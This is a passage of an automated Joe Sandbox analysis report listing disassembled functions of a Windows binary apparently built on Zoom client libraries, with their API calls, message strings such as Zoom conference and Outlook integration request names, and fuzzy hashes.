                • Instruction Fuzzy Hash: 6141EF35E003059BCF24EBA4C98569EB7B5AF44319F044118EC12BB391DF709A8ADBB9
                Function 00CAA8D0 Relevance: 24.2, APIs: 16, Instructions: 212COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAA8DA
                  • Part of subcall function 00C59CDE: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,00C5BE77,?,00000000,?,?,00C5A4FD,00000000,?,?,?,00000000,00000002), ref: 00C59CF3
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000090), ref: 00CAA927
                • ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAA952
                  • Part of subcall function 00CAADE0: __EH_prolog3.LIBCMT ref: 00CAADE7
                  • Part of subcall function 00CAADE0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAADFA
                  • Part of subcall function 00CAADE0: ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE0B
                  • Part of subcall function 00CAADE0: ?find_last_of@?$CStringT@_W@Cmm@@QBEIPB_WII@Z.RWSNDPQSKZ(?,000000FF,00000002,?,00000008,00CAA957,?), ref: 00CAAE27
                  • Part of subcall function 00CAADE0: ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE89
                  • Part of subcall function 00CAADE0: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE9B
                • ??9FilePath@Cmm@@QBE_NABV01@@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAA95F
                  • Part of subcall function 00CAAC30: __EH_prolog3.LIBCMT ref: 00CAAC37
                  • Part of subcall function 00CAAC30: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?), ref: 00CAAC49
                  • Part of subcall function 00CAAC30: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ ref: 00CAAC58
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(?,-00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAA9B3
                • ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,?,-00000004,?,00000000,?), ref: 00CAA9F3
                • ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA23
                • ??9FilePath@Cmm@@QBE_NABV01@@Z.RWSNDPQSKZ(00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA30
                • ?BaseName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAAA4D
                  • Part of subcall function 00CAAEB0: __EH_prolog3.LIBCMT ref: 00CAAEB7
                  • Part of subcall function 00CAAEB0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004,00CAAA52,?,00000000,?), ref: 00CAAECA
                  • Part of subcall function 00CAAEB0: ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000004,00CAAA52,?,00000000,?), ref: 00CAAEDB
                  • Part of subcall function 00CAAEB0: ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,00000001,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAEF1
                  • Part of subcall function 00CAAEB0: ?find_last_of@?$CStringT@_W@Cmm@@QBEIPB_WII@Z.RWSNDPQSKZ(?,000000FF,00000002,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAF01
                  • Part of subcall function 00CAAEB0: ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,00000001,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAF1A
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA87
                • ?BaseName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA97
                • ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAC2
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@I@Z.RWSNDPQSKZ(?,00000001,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAE1
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAFE
                  • Part of subcall function 00CA9D80: __EH_prolog3_catch.LIBCMT ref: 00CA9D87
                  • Part of subcall function 00CA9D80: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000000,?,00000014,00CA9D6F,?,?,?,?,00CA9C1E,?,00000004), ref: 00CA9DDC
                  • Part of subcall function 00CAB8C2: __EH_prolog3.LIBCMT ref: 00CAB8C9
                  • Part of subcall function 00C57389: _Deallocate.LIBCONCRT ref: 00C573AC
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$FilePath@$V01@@$??0?$$Name@V12@$H_prolog3$Internal@SeparatorsStripTrailing$?erase@?$?find_last_of@?$BaseDeallocateU?$char_traits@_V?$_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$?rbegin@?$Assign@?$Compare@?$H_prolog3_H_prolog3_catchSimple_types@_State@String_const_iterator@String_val@U?$_Unlock@V01@V?$reverse_iterator@W@std@@@std@@@std@@@std@@
                • String ID:
                • API String ID: 345324657-0
                • Opcode ID: da2ec3144ad49263b38d7b35b7edd6e43db781ee38b99976bf927146b2a941d9
                • Instruction ID: 6388b60f0d2511fca39eea2db9237a2165b46f5a7fcb0d30b239518c14edd4bd
                • Opcode Fuzzy Hash: da2ec3144ad49263b38d7b35b7edd6e43db781ee38b99976bf927146b2a941d9
                • Instruction Fuzzy Hash: ED914B75C00219DBCF15DFA4C991ADDBBB4AF19304F148199E849B3242EF306B89DF66
                Function 00C92963 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 122COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C9296A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C92984
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C929B2
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,?), ref: 00C929EF
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,-00000004,-00000004,?), ref: 00C92A1F
                • EnterCriticalSection.KERNEL32(?), ref: 00C92AB1
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C92ACE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,?), ref: 00C92AE1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: device_id$device_name$is_enable$level$req_type
                • API String ID: 1443623190-2683151144
                • Opcode ID: 89adb8acf9c14040c9e89e2a295b417382c38edfee9a19b7834d74bc1184d774
                • Instruction ID: b98327f2656d8af64ccd138c6efa395f3b1f1f1cbbe39127a0b7d00e45160259
                • Opcode Fuzzy Hash: 89adb8acf9c14040c9e89e2a295b417382c38edfee9a19b7834d74bc1184d774
                • Instruction Fuzzy Hash: 8441D335A00619ABCF24EFA4D9496DDB775AF44315F044118EC12AB381DF30DF8AEBA9
                Function 00C9022D Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90234
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6FA9B), ref: 00C90248
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.request,00000044,00C6FA9B), ref: 00C9027A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C902B7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.request,?,-00000004), ref: 00C902E9
                • EnterCriticalSection.KERNEL32(00C6FA9B), ref: 00C9036B
                • LeaveCriticalSection.KERNEL32(00C6FA9B,?), ref: 00C90388
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C9039B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.request$signalType$sourceType$txChannelID$userID
                • API String ID: 1443623190-7522296
                • Opcode ID: 0f5f68adc885b96648307ff66ebf0d45f545f445a5e227d114f9dd0eb1c94b15
                • Instruction ID: 214c975e82a5909152bfc20666c6943eeddaadd7cb973817427a04338ba7f333
                • Opcode Fuzzy Hash: 0f5f68adc885b96648307ff66ebf0d45f545f445a5e227d114f9dd0eb1c94b15
                • Instruction Fuzzy Hash: 2F41DE75E006089FCF14EFA4C85969DB7B5AF48305F144128E812A7391DF709A8AEBA9
                Function 00C8635D Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C86364
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6871B), ref: 00C86378
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfStatus,00000044,00C6871B), ref: 00C863AA
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C863E7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfStatus,?,-00000004), ref: 00C86419
                • EnterCriticalSection.KERNEL32(00C6871B), ref: 00C8649B
                • LeaveCriticalSection.KERNEL32(00C6871B,?), ref: 00C864B8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C864CB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: FailoverReason$MeetingID$MeetingNumber$com.Zoom.app.conf.notifyConfStatus$status
                • API String ID: 1443623190-451630439
                • Opcode ID: 2b33f91bfaa3f25326be2a2aea8a1a5e93e449a535ce32229d113413c2eaf2b1
                • Instruction ID: 6c4179af36116a9956b566a177f3c19bf078b1730ad9b9a465b280f4f51d2ef2
                • Opcode Fuzzy Hash: 2b33f91bfaa3f25326be2a2aea8a1a5e93e449a535ce32229d113413c2eaf2b1
                • Instruction Fuzzy Hash: 0341D475E007149BCF15EFA4D845ADDB7B0AF44319F044118E812AB391DF709A8AEBA9
                Function 00C94493 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C9449A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C74F8B), ref: 00C944AE
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.conf.idp.token.result,00000044,00C74F8B), ref: 00C944E0
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C9451D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.conf.idp.token.result,?,-00000004), ref: 00C9454F
                • EnterCriticalSection.KERNEL32(00C74F8B), ref: 00C945D1
                • LeaveCriticalSection.KERNEL32(00C74F8B,?), ref: 00C945EE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C94601
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: b64IDToken$b64token$com.Zoom.app.conf.notify.conf.idp.token.result$error$reqID
                • API String ID: 1443623190-2104861163
                • Opcode ID: a21fa0d8d0db357fa6733eae4b730691c7790855e36e144e4130dd7f8ea04c1a
                • Instruction ID: 60ea8fcec7c04bc9a315c1caa6aee3682af2b18428597dc6c9329917e89f533d
                • Opcode Fuzzy Hash: a21fa0d8d0db357fa6733eae4b730691c7790855e36e144e4130dd7f8ea04c1a
                • Instruction Fuzzy Hash: 8441F575E007049BCF18EBA4C949ADDB7B0AF55305F044158EC12AB391DF709B8BDB69
                Function 00C965E3 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C965EA
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C7720B), ref: 00C965FE
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pmc.meet.chat.msg.readed.req,00000044,00C7720B), ref: 00C96630
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C9666D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pmc.meet.chat.msg.readed.req,?,-00000004), ref: 00C9669F
                • EnterCriticalSection.KERNEL32(00C7720B), ref: 00C96721
                • LeaveCriticalSection.KERNEL32(00C7720B,?), ref: 00C9673E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C96751
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.pmc.meet.chat.msg.readed.req$imChatMsgId$localReadedTime$meetChatMsgId$sessionId
                • API String ID: 1443623190-622571351
                • Opcode ID: 257999aa9edc0bea9fa5f41392664cadd6931e40db463c50b0e7499983df309a
                • Instruction ID: bbadaac864ac47608df9b06072e741149ae583b8a3ca9a584897d31a6888bf01
                • Opcode Fuzzy Hash: 257999aa9edc0bea9fa5f41392664cadd6931e40db463c50b0e7499983df309a
                • Instruction Fuzzy Hash: 0E41D474E007089BCF14EFA5D8496EDB775AF44309F044118E812A73D1DF709B8ADB69
                Function 00C8C570 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8C577
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C4CB), ref: 00C8C58B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.response,00000044,00C6C4CB), ref: 00C8C5BD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8C5FA
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.response,?,-00000004), ref: 00C8C62C
                • EnterCriticalSection.KERNEL32(00C6C4CB), ref: 00C8C6AE
                • LeaveCriticalSection.KERNEL32(00C6C4CB,?), ref: 00C8C6CB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C8C6DE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.pt.mediaapi.response$in_meeting$requestID$response_code$response_data
                • API String ID: 1443623190-917114086
                • Opcode ID: 57703040af50f30d8111db44f1edfceb224311ec580c79b9d496dad903a4c337
                • Instruction ID: 2f1ecc698f524867a66ab5b6bfddeca9322ad00969e62231edbc85dc9cc45d76
                • Opcode Fuzzy Hash: 57703040af50f30d8111db44f1edfceb224311ec580c79b9d496dad903a4c337
                • Instruction Fuzzy Hash: 8A41C434E007049BCF14EBA4D9466DDB774AF54319F044129F812AB391EF709A4ADB7D
                Function 00C92571 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 115COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C92578
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71BDB), ref: 00C9258C
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.outlook.imintegration.getcontactinfo.response,00000044,00C71BDB), ref: 00C925BE
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C925FB
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.outlook.imintegration.getcontactinfo.response,?,-00000004), ref: 00C9262D
                • EnterCriticalSection.KERNEL32(00C71BDB), ref: 00C926AF
                • LeaveCriticalSection.KERNEL32(00C71BDB,?), ref: 00C926CC
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C926DF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: ContactEmail$PhotoPath$com.zoom.app.outlook.imintegration.getcontactinfo.response$presence$presenceText
                • API String ID: 1443623190-1042731040
